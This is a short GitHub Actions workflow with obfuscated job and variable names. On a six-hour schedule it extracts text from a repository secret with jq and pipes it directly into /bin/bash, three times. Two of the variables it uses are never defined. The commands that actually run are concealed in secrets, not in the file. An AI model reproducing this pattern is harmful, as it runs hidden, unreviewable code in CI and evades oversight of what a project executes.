name: dingqianxuan6453

on:
  workflow_dispatch:
  schedule:
    - cron: '41 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: dingqianxuan6453
        env:
          c9331: ${{ secrets.c9331 }}
        run: |
          echo $c9331 | jq -r .ovvxs3894 | /bin/bash
          echo $xwsi237 | jq -r .q0118 | /bin/bash
          echo $yhjj9349 | jq -r .evq20085 | /bin/bash

